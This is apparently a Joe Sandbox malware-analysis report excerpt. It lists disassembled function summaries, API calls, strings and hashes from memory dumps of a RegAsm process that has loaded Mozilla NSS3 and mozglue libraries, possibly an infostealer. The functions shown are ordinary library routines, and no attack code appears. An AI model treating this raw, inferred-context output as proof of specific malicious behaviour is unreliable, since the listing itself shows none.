free.MOZGLUE(?), ref: 6CD86ED5
free.MOZGLUE(00000000), ref: 6CD86EE3
free.MOZGLUE(?), ref: 6CD86EF4
free.MOZGLUE(?), ref: 6CD86F08
free.MOZGLUE(00000000), ref: 6CD86F35
free.MOZGLUE(?), ref: 6CD86F44
free.MOZGLUE(?), ref: 6CD86F5B
free.MOZGLUE(00000000), ref: 6CD86F65

Part of subcall function 6CD86C30: strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,dbm:,00000004,6CD8781D,00000000,6CD7BE2C,?,6CD86B1D,?,?,?,?,00000000,00000000,6CD8781D), ref: 6CD86C40
Part of subcall function 6CD86C30: strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,sql:,00000004,?,?,?,?,?,?,?,00000000,00000000,6CD8781D,?,6CD7BE2C,?), ref: 6CD86C58
Part of subcall function 6CD86C30: strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,rdb:,00000004,?,?,?,?,?,?,?,?,?,?,00000000,00000000,6CD8781D), ref: 6CD86C6F
Part of subcall function 6CD86C30: strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,extern:,00000007), ref: 6CD86C84
Part of subcall function 6CD86C30: PR_GetEnvSecure.NSS3(NSS_DEFAULT_DB_TYPE), ref: 6CD86C96
Part of subcall function 6CD86C30: strcmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,dbm), ref: 6CD86CAA

strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?), ref: 6CD86F90
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?), ref: 6CD86FC5
PK11_GetInternalKeySlot.NSS3 ref: 6CD86FF4

Memory Dump Source

Source File: 00000004.00000002.2412659173.000000006CCC1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CCC0000, based on PE: true

Associated: 00000004.00000002.2412639409.000000006CCC0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2413390971.000000006CE5F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2413523450.000000006CE9E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2413549858.000000006CE9F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2413572139.000000006CEA0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2413587501.000000006CEA5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6ccc0000_RegAsm.jbxd

Similarity

API ID: free$strcmp$strncmp$FlagL_strncasecmp$Strip$InternalK11_ParameterSecureSkipSlot
String ID:
API String ID: 1304971872-0
Opcode ID: 769f5397b1c9a9fe988bbf3b225c42c4c9f3a09f9ede5d6cf8446e53c053c51e
Instruction ID: b2b89c12020ccb00a29ea7fd15fae4692abbaabc4c22ff18b54429103e374f99
Opcode Fuzzy Hash: 769f5397b1c9a9fe988bbf3b225c42c4c9f3a09f9ede5d6cf8446e53c053c51e
Instruction Fuzzy Hash: 2DB19EB0E12209DFDF01DFA5D845B9EBBB8AF04369F144025E815E7A60E731E916CBB1

Uniqueness

Uniqueness Score: -1.00%

Function 6CD84C20 Relevance: 30.3, APIs: 20, Instructions: 290memoryCOMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32 ref: 6CD84C4C
EnterCriticalSection.KERNEL32(?), ref: 6CD84C60
PR_Unlock.NSS3(?,?,?,?,?,?,?,?,?,?,?), ref: 6CD84CA1
TlsGetValue.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 6CD84CBE
EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 6CD84CD2
realloc.MOZGLUE(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6CD84D3A
PORT_Alloc_Util.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6CD84D4F
PR_Unlock.NSS3(?,?,?,?,?,?,?,?,?,?,?), ref: 6CD84DB7

Part of subcall function 6CDEDD70: TlsGetValue.KERNEL32 ref: 6CDEDD8C
Part of subcall function 6CDEDD70: LeaveCriticalSection.KERNEL32(00000000), ref: 6CDEDDB4

Part of subcall function 6CD307A0: TlsGetValue.KERNEL32(00000000,?,?,?,?,6CCC204A), ref: 6CD307AD
Part of subcall function 6CD307A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6CCC204A), ref: 6CD307CD
Part of subcall function 6CD307A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6CCC204A), ref: 6CD307D6
Part of subcall function 6CD307A0: calloc.MOZGLUE(00000001,00000144,?,?,?,?,6CCC204A), ref: 6CD307E4
Part of subcall function 6CD307A0: TlsSetValue.KERNEL32(00000000,?,6CCC204A), ref: 6CD30864
Part of subcall function 6CD307A0: calloc.MOZGLUE(00000001,0000002C), ref: 6CD30880
Part of subcall function 6CD307A0: TlsSetValue.KERNEL32(00000000,?,?,6CCC204A), ref: 6CD308CB
Part of subcall function 6CD307A0: TlsGetValue.KERNEL32(?,?,6CCC204A), ref: 6CD308D7
Part of subcall function 6CD307A0: TlsGetValue.KERNEL32(?,?,6CCC204A), ref: 6CD308FB

TlsGetValue.KERNEL32 ref: 6CD84DD7
EnterCriticalSection.KERNEL32(?), ref: 6CD84DEC
PR_Unlock.NSS3(?), ref: 6CD84E1B
PR_SetError.NSS3(00000000,00000000), ref: 6CD84E2F
PR_SetError.NSS3(FFFFE013,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6CD84E5A
PR_SetError.NSS3(00000000,00000000), ref: 6CD84E71
free.MOZGLUE(00000000), ref: 6CD84E7A
PR_Unlock.NSS3(?), ref: 6CD84EA2
TlsGetValue.KERNEL32 ref: 6CD84EC1
EnterCriticalSection.KERNEL32(?), ref: 6CD84ED6
PR_Unlock.NSS3(?), ref: 6CD84F01
free.MOZGLUE(00000000), ref: 6CD84F2A

Memory Dump Source

Source File: 00000004.00000002.2412659173.000000006CCC1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CCC0000, based on PE: true

Associated: 00000004.00000002.2412639409.000000006CCC0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2413390971.000000006CE5F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2413523450.000000006CE9E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2413549858.000000006CE9F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2413572139.000000006CEA0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2413587501.000000006CEA5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6ccc0000_RegAsm.jbxd

Similarity

API ID: Value$CriticalSectionUnlock$Enter$Error$callocfree$Alloc_LeaveUtilrealloc
String ID:
API String ID: 759471828-0
Opcode ID: 4d4ed1b7147edd731d83caa1da18f9e131a351eb4a2f7ff213bed4be61b65928
Instruction ID: 55550a826fbbaba3dad4a67b84919e3a6c15182820c9e02fa943cb2f582e26ec
Opcode Fuzzy Hash: 4d4ed1b7147edd731d83caa1da18f9e131a351eb4a2f7ff213bed4be61b65928
Instruction Fuzzy Hash: 81B12571A01205DFDB01EF68D894BAE77B8BF49318F044129ED1597B21EB34E964CBE2

Uniqueness

Uniqueness Score: -1.00%

Function 6CDD6E90 Relevance: 30.1, APIs: 11, Strings: 6, Instructions: 305fileCOMMON

Download Yara Rule

APIs

PR_GetEnvSecure.NSS3(SSLKEYLOGFILE,?,6CDD6BF7), ref: 6CDD6EB6

Part of subcall function 6CD31240: TlsGetValue.KERNEL32(00000040,?,6CD3116C,NSPR_LOG_MODULES), ref: 6CD31267
Part of subcall function 6CD31240: EnterCriticalSection.KERNEL32(?,?,?,6CD3116C,NSPR_LOG_MODULES), ref: 6CD3127C
Part of subcall function 6CD31240: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(?,?,?,?,6CD3116C,NSPR_LOG_MODULES), ref: 6CD31291
Part of subcall function 6CD31240: PR_Unlock.NSS3(?,?,?,?,6CD3116C,NSPR_LOG_MODULES), ref: 6CD312A0

fopen.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,6CE7FC0A,6CDD6BF7), ref: 6CDD6ECD
ftell.API-MS-WIN-CRT-STDIO-L1-1-0(00000000), ref: 6CDD6EE0
fwrite.API-MS-WIN-CRT-STDIO-L1-1-0(# SSL/TLS secrets log file, generated by NSS,0000002D,00000001), ref: 6CDD6EFC
PR_NewLock.NSS3 ref: 6CDD6F04
fclose.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 6CDD6F18
PR_GetEnvSecure.NSS3(SSLFORCELOCKS,6CDD6BF7), ref: 6CDD6F30
PR_GetEnvSecure.NSS3(NSS_SSL_ENABLE_RENEGOTIATION,?,6CDD6BF7), ref: 6CDD6F54
PR_GetEnvSecure.NSS3(NSS_SSL_REQUIRE_SAFE_NEGOTIATION,?,?,6CDD6BF7), ref: 6CDD6FE0
PR_GetEnvSecure.NSS3(NSS_SSL_CBC_RANDOM_IV,?,?,?,6CDD6BF7), ref: 6CDD6FFD

Strings

SSLKEYLOGFILE, xrefs: 6CDD6EB1
NSS_SSL_CBC_RANDOM_IV, xrefs: 6CDD6FF8
NSS_SSL_REQUIRE_SAFE_NEGOTIATION, xrefs: 6CDD6FDB
SSLFORCELOCKS, xrefs: 6CDD6F2B
# SSL/TLS secrets log file, generated by NSS, xrefs: 6CDD6EF7
NSS_SSL_ENABLE_RENEGOTIATION, xrefs: 6CDD6F4F

Memory Dump Source

Source File: 00000004.00000002.2412659173.000000006CCC1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CCC0000, based on PE: true

Associated: 00000004.00000002.2412639409.000000006CCC0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2413390971.000000006CE5F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2413523450.000000006CE9E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2413549858.000000006CE9F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2413572139.000000006CEA0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2413587501.000000006CEA5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6ccc0000_RegAsm.jbxd

Similarity

API ID: Secure$CriticalEnterLockSectionUnlockValuefclosefopenftellfwritegetenv
String ID: # SSL/TLS secrets log file, generated by NSS$NSS_SSL_CBC_RANDOM_IV$NSS_SSL_ENABLE_RENEGOTIATION$NSS_SSL_REQUIRE_SAFE_NEGOTIATION$SSLFORCELOCKS$SSLKEYLOGFILE
API String ID: 412497378-2352201381
Opcode ID: 0ede835dc56a1a21dc3ea027859ab017803fa3a2a17d16755195b69e48f742dd
Instruction ID: 512c935353e7232e9b4f9effa7701ddbbd6f753237665a6c055b174e81cf0386
Opcode Fuzzy Hash: 0ede835dc56a1a21dc3ea027859ab017803fa3a2a17d16755195b69e48f742dd
Instruction Fuzzy Hash: 6CA123B3E559909BE700477CD80174836B1AB97329F1B47A9E872C6EF9DB35B4408382

Uniqueness

Uniqueness Score: -1.00%

Function 6CD74E60 Relevance: 28.1, APIs: 9, Strings: 7, Instructions: 127COMMON

Download Yara Rule

APIs

PR_LogPrint.NSS3(C_GetAttributeValue), ref: 6CD74E83
PL_strncpyz.NSS3(?, hSession = 0x%x,00000050), ref: 6CD74EB8
PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6CD74EC7

Part of subcall function 6CE5D930: PL_strncpyz.NSS3(?,?,?), ref: 6CE5D963

PR_LogPrint.NSS3(?,00000000), ref: 6CD74EDD
PL_strncpyz.NSS3(?, hObject = 0x%x,00000050), ref: 6CD74F0B
PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6CD74F1A
PR_LogPrint.NSS3(?,00000000), ref: 6CD74F30
PR_LogPrint.NSS3( pTemplate = 0x%p,?), ref: 6CD74F4F
PR_LogPrint.NSS3( ulCount = %d,?), ref: 6CD74F68

Strings

(CK_INVALID_HANDLE), xrefs: 6CD74EC0, 6CD74F13
ulCount = %d, xrefs: 6CD74F63
hSession = 0x%x, xrefs: 6CD74EA2, 6CD74EB2
nl, xrefs: 6CD74F82, 6CD74FB2
hObject = 0x%x, xrefs: 6CD74EF5, 6CD74F05
pTemplate = 0x%p, xrefs: 6CD74F4A
C_GetAttributeValue, xrefs: 6CD74E7E

Memory Dump Source

Source File: 00000004.00000002.2412659173.000000006CCC1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CCC0000, based on PE: true

Associated: 00000004.00000002.2412639409.000000006CCC0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2413390971.000000006CE5F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2413523450.000000006CE9E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2413549858.000000006CE9F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2413572139.000000006CEA0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2413587501.000000006CEA5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6ccc0000_RegAsm.jbxd

Similarity

API ID: Print$L_strncpyz$L_strcatn
String ID: hObject = 0x%x$ hSession = 0x%x$ pTemplate = 0x%p$ ulCount = %d$ (CK_INVALID_HANDLE)$C_GetAttributeValue$nl
API String ID: 1003633598-1707530925
Opcode ID: d9547a54c4aba752258c6d6222e81328995a26cfe1bbbacb0920e98b41d99acf
Instruction ID: 04b0db22f5f37e93e437d76865ae466540a82e3a25724ef56b49f949364c095d
Opcode Fuzzy Hash: d9547a54c4aba752258c6d6222e81328995a26cfe1bbbacb0920e98b41d99acf
Instruction Fuzzy Hash: FB412476A01100AFDB128F95ED88F9F77B5EB5231CF548028F80867A21DB309958CFB1

Uniqueness

Uniqueness Score: -1.00%

Function 6CD74CD0 Relevance: 28.1, APIs: 9, Strings: 7, Instructions: 120COMMON

Download Yara Rule

APIs

PR_LogPrint.NSS3(C_GetObjectSize), ref: 6CD74CF3
PL_strncpyz.NSS3(?, hSession = 0x%x,00000050), ref: 6CD74D28
PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6CD74D37

Part of subcall function 6CE5D930: PL_strncpyz.NSS3(?,?,?), ref: 6CE5D963

PR_LogPrint.NSS3(?,00000000), ref: 6CD74D4D
PL_strncpyz.NSS3(?, hObject = 0x%x,00000050), ref: 6CD74D7B
PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6CD74D8A
PR_LogPrint.NSS3(?,00000000), ref: 6CD74DA0
PR_LogPrint.NSS3( pulSize = 0x%p,?), ref: 6CD74DBC
PR_LogPrint.NSS3( *pulSize = 0x%x,?), ref: 6CD74E20

Strings

(CK_INVALID_HANDLE), xrefs: 6CD74D30, 6CD74D83
hSession = 0x%x, xrefs: 6CD74D12, 6CD74D22
C_GetObjectSize, xrefs: 6CD74CEE
pulSize = 0x%p, xrefs: 6CD74DB7
*pulSize = 0x%x, xrefs: 6CD74E1B
nl, xrefs: 6CD74DD4, 6CD74DFF
hObject = 0x%x, xrefs: 6CD74D65, 6CD74D75

Memory Dump Source

Source File: 00000004.00000002.2412659173.000000006CCC1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CCC0000, based on PE: true

Associated: 00000004.00000002.2412639409.000000006CCC0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2413390971.000000006CE5F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2413523450.000000006CE9E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2413549858.000000006CE9F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2413572139.000000006CEA0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2413587501.000000006CEA5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6ccc0000_RegAsm.jbxd

Similarity

API ID: Print$L_strncpyz$L_strcatn
String ID: *pulSize = 0x%x$ hObject = 0x%x$ hSession = 0x%x$ pulSize = 0x%p$ (CK_INVALID_HANDLE)$C_GetObjectSize$nl
API String ID: 1003633598-534071768
Opcode ID: 97a4825057fe027ca619815e06ff6c547955e71e2dca2cc016f6dcd21fde3a36
Instruction ID: 441e81de36e71459dbac8894ef3fa538479c5e3688a20d83f0bfaa419ad0274b
Opcode Fuzzy Hash: 97a4825057fe027ca619815e06ff6c547955e71e2dca2cc016f6dcd21fde3a36
Instruction Fuzzy Hash: 6F412772B00100EFDB129B55EE88B6E37B5EB5230DF544069F809ABA21DB319958CF72

Uniqueness

Uniqueness Score: -1.00%

Function 6CD98E40 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 198stringmemoryCOMMON

Download Yara Rule

APIs

memchr.VCRUNTIME140(abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789-_,00000000,00000041,6CD98E01,00000000,6CD99060,6CEA0B64), ref: 6CD98E7B
strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,?,6CD98E01,00000000,6CD99060,6CEA0B64), ref: 6CD98E9E
PORT_ArenaAlloc_Util.NSS3(6CEA0B64,00000001,?,?,?,?,6CD98E01,00000000,6CD99060,6CEA0B64), ref: 6CD98EAD
memcpy.VCRUNTIME140(00000000,00000000,00000001,?,?,?,?,?,?,6CD98E01,00000000,6CD99060,6CEA0B64), ref: 6CD98EC3
strlen.API-MS-WIN-CRT-STRING-L1-1-0(5D8B5657,?,?,?,?,?,?,?,?,?,6CD98E01,00000000,6CD99060,6CEA0B64), ref: 6CD98ED8
PORT_ArenaAlloc_Util.NSS3(?,00000001,?,?,?,?,?,?,?,?,?,?,6CD98E01,00000000,6CD99060,6CEA0B64), ref: 6CD98EE5
memcpy.VCRUNTIME140(00000000,5D8B5657,00000001,?,?,?,?,?,?,?,?,?,?,?,?,6CD98E01), ref: 6CD98EFB
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(6CEA0B64,6CEA0B64), ref: 6CD98F11
PORT_ArenaGrow_Util.NSS3(?,5D8B5657,643D8B08), ref: 6CD98F3F

Part of subcall function 6CD9A110: PORT_ArenaGrow_Util.NSS3(8514C483,EB2074C0,184D8B3E,?,00000000,00000000,00000000,FFFFFFFF,?,6CD9A421,00000000,00000000,6CD99826), ref: 6CD9A136

PR_SetError.NSS3(FFFFE013,00000000), ref: 6CD9904A

Strings

abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789-_, xrefs: 6CD98E76

Memory Dump Source

Source File: 00000004.00000002.2412659173.000000006CCC1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CCC0000, based on PE: true

Associated: 00000004.00000002.2412639409.000000006CCC0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2413390971.000000006CE5F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2413523450.000000006CE9E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2413549858.000000006CE9F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2413572139.000000006CEA0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2413587501.000000006CEA5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6ccc0000_RegAsm.jbxd

Similarity

API ID: ArenaUtil$Alloc_Grow_memcpystrlen$Errormemchrstrcmp
String ID: abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789-_
API String ID: 977052965-1032500510
Opcode ID: c93b72ca1aac5bd19324076d98448e6b3a75a0ebf568716e09d8aa19bac6ec1f
Instruction ID: d3c7607a8891b29b189fefb0f28c34284481e4f530a2b349fba26fb5842ec937
Opcode Fuzzy Hash: c93b72ca1aac5bd19324076d98448e6b3a75a0ebf568716e09d8aa19bac6ec1f
Instruction Fuzzy Hash: 2C6182B9D002059FDB10CF55CC40AABB7B5EF84358F244129DC2DA7760E736A915CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 6CD48E00 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 193memoryCOMMON

Download Yara Rule

APIs

PR_SetError.NSS3(FFFFE005,00000000), ref: 6CD48E5B
PR_SetError.NSS3(FFFFE007,00000000), ref: 6CD48E81
PL_InitArenaPool.NSS3(?,security,00000800,00000008), ref: 6CD48EED
SEC_QuickDERDecodeItem_Util.NSS3(?,?,6CE718D0,?), ref: 6CD48F03
PR_CallOnce.NSS3(6CEA2AA4,6CDA12D0), ref: 6CD48F19
PL_FreeArenaPool.NSS3(?), ref: 6CD48F2B
PORT_ArenaAlloc_Util.NSS3(?,00000001), ref: 6CD48F53
memset.VCRUNTIME140(00000000,00000000,00000001), ref: 6CD48F65
PL_FinishArenaPool.NSS3(?), ref: 6CD48FA1
SECITEM_DupItem_Util.NSS3(?), ref: 6CD48FFE
PR_CallOnce.NSS3(6CEA2AA4,6CDA12D0), ref: 6CD49012
PL_FreeArenaPool.NSS3(?), ref: 6CD49024
PL_FinishArenaPool.NSS3(?), ref: 6CD4902C
PORT_DestroyCheapArena.NSS3(?), ref: 6CD4903E

Strings

security, xrefs: 6CD48EE7

Memory Dump Source

Source File: 00000004.00000002.2412659173.000000006CCC1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CCC0000, based on PE: true

Associated: 00000004.00000002.2412639409.000000006CCC0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2413390971.000000006CE5F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2413523450.000000006CE9E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2413549858.000000006CE9F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2413572139.000000006CEA0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2413587501.000000006CEA5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6ccc0000_RegAsm.jbxd

Similarity

API ID: Arena$Pool$Util$CallErrorFinishFreeItem_Once$Alloc_CheapDecodeDestroyInitQuickmemset
String ID: security
API String ID: 3512696800-3315324353
Opcode ID: 63b22719a04e48fe28ab1d6ff2c07654fc53d9f76cae297225e4d950d959c370
Instruction ID: 9817d13dddbc41d6de5547896553e9a286ba56b5b36709c9205487518029551b
Opcode Fuzzy Hash: 63b22719a04e48fe28ab1d6ff2c07654fc53d9f76cae297225e4d950d959c370
Instruction Fuzzy Hash: 72513971508300EBD7109B99DC41FAB33E8AB8579CF54482EF695D7A60E732D80987A3

Uniqueness

Uniqueness Score: -1.00%

Function 6CBD5E60 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 182threadstringtimeCOMMON

Download Yara Rule

APIs

?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 6CBD5E9D

Part of subcall function 6CBE5B50: QueryPerformanceCounter.KERNEL32(?,?,?,?,6CBE56EE,?,00000001), ref: 6CBE5B85
Part of subcall function 6CBE5B50: EnterCriticalSection.KERNEL32(6CC4F688,?,?,?,6CBE56EE,?,00000001), ref: 6CBE5B90
Part of subcall function 6CBE5B50: LeaveCriticalSection.KERNEL32(6CC4F688,?,?,?,6CBE56EE,?,00000001), ref: 6CBE5BD8
Part of subcall function 6CBE5B50: GetTickCount64.KERNEL32 ref: 6CBE5BE4

GetCurrentThreadId.KERNEL32 ref: 6CBD5EAB
GetCurrentThreadId.KERNEL32 ref: 6CBD5EB8
strlen.API-MS-WIN-CRT-STRING-L1-1-0(GeckoMain,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 6CBD5ECF
memcpy.VCRUNTIME140(00000000,GeckoMain,00000000), ref: 6CBD6017

Part of subcall function 6CBC4310: moz_xmalloc.MOZGLUE(00000010,?,6CBC42D2), ref: 6CBC436A
Part of subcall function 6CBC4310: memcpy.VCRUNTIME140(00000023,?,?,?,?,6CBC42D2), ref: 6CBC4387

moz_xmalloc.MOZGLUE(00000004), ref: 6CBD5F47
GetCurrentProcess.KERNEL32 ref: 6CBD5F53
GetCurrentThread.KERNEL32 ref: 6CBD5F5C
GetCurrentProcess.KERNEL32 ref: 6CBD5F66
DuplicateHandle.KERNEL32(00000000,?,?,?,0000004A,00000000,00000000), ref: 6CBD5F7E
moz_xmalloc.MOZGLUE(00000024), ref: 6CBD5F27

Part of subcall function 6CBDCA10: mozalloc_abort.MOZGLUE(?), ref: 6CBDCAA2

moz_xmalloc.MOZGLUE(00000040,?,?,?,?,?,?,?,?,?,?,00000000,00000000,?,6CBD55E1), ref: 6CBD5E8C

Part of subcall function 6CBDCA10: malloc.MOZGLUE(?), ref: 6CBDCA26

moz_xmalloc.MOZGLUE(00000050,?,?,?,?,?,?,?,?,?,?,00000000,00000000,?,6CBD55E1), ref: 6CBD605D
free.MOZGLUE(?,?,?,?,?,?,?,?,?,?,?,00000000,00000000,?,6CBD55E1), ref: 6CBD60CC

Strings

GeckoMain, xrefs: 6CBD5ECE, 6CBD6015

Memory Dump Source

Source File: 00000004.00000002.2412300207.000000006CBC1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6CBC0000, based on PE: true

Associated: 00000004.00000002.2412272729.000000006CBC0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.2412533246.000000006CC3D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.2412586168.000000006CC4E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.2412609993.000000006CC52000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6cbc0000_RegAsm.jbxd

Similarity

API ID: Currentmoz_xmalloc$Thread$CriticalProcessSectionmemcpy$Count64CounterDuplicateEnterHandleLeaveNow@PerformanceQueryStamp@mozilla@@TickTimeV12@_freemallocmozalloc_abortstrlen
String ID: GeckoMain
API String ID: 3711609982-966795396
Opcode ID: 0e3743d35f175f822ad2412568a03b5a2fad59909361ef0648ed2c115b8b83cd
Instruction ID: 3a032704f10fe746c1d5b4ba0da749c7f41c58090901651b13d03b5ea0d56100
Opcode Fuzzy Hash: 0e3743d35f175f822ad2412568a03b5a2fad59909361ef0648ed2c115b8b83cd
Instruction Fuzzy Hash: AB71B3B06057809FD710DF25C480A6ABBF0FF99308F55896DE5868BB52D731E948CB92

Uniqueness

Uniqueness Score: -1.00%

Function 6CE0CD70 Relevance: 26.3, APIs: 10, Strings: 5, Instructions: 76COMMON

Download Yara Rule

APIs

PR_LoadLibrary.NSS3(ws2_32.dll,?,?,?,6CE0CC7B), ref: 6CE0CD7A

Part of subcall function 6CE0CE60: PR_LoadLibraryWithFlags.NSS3(?,?,?,?,00000000,?,6CD7C1A8,?), ref: 6CE0CE92

PR_FindSymbol.NSS3(00000000,freeaddrinfo), ref: 6CE0CDA5
PR_FindSymbol.NSS3(00000000,getnameinfo), ref: 6CE0CDB8
PR_UnloadLibrary.NSS3(00000000), ref: 6CE0CDDB
PR_FindSymbol.NSS3(00000000,getaddrinfo), ref: 6CE0CD8E

Part of subcall function 6CD305C0: PR_EnterMonitor.NSS3 ref: 6CD305D1
Part of subcall function 6CD305C0: PR_ExitMonitor.NSS3 ref: 6CD305EA

PR_LoadLibrary.NSS3(wship6.dll), ref: 6CE0CDE8
PR_FindSymbol.NSS3(00000000,getaddrinfo), ref: 6CE0CDFF
PR_FindSymbol.NSS3(00000000,freeaddrinfo), ref: 6CE0CE16
PR_FindSymbol.NSS3(00000000,getnameinfo), ref: 6CE0CE29
PR_UnloadLibrary.NSS3(00000000), ref: 6CE0CE48

Strings

ws2_32.dll, xrefs: 6CE0CD75
getaddrinfo, xrefs: 6CE0CD88, 6CE0CDF9
getnameinfo, xrefs: 6CE0CDB2, 6CE0CE23
freeaddrinfo, xrefs: 6CE0CD9F, 6CE0CE10
wship6.dll, xrefs: 6CE0CDE3

Memory Dump Source

Source File: 00000004.00000002.2412659173.000000006CCC1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CCC0000, based on PE: true

Associated: 00000004.00000002.2412639409.000000006CCC0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2413390971.000000006CE5F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2413523450.000000006CE9E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2413549858.000000006CE9F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2413572139.000000006CEA0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2413587501.000000006CEA5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6ccc0000_RegAsm.jbxd

Similarity

API ID: FindSymbol$Library$Load$MonitorUnload$EnterExitFlagsWith
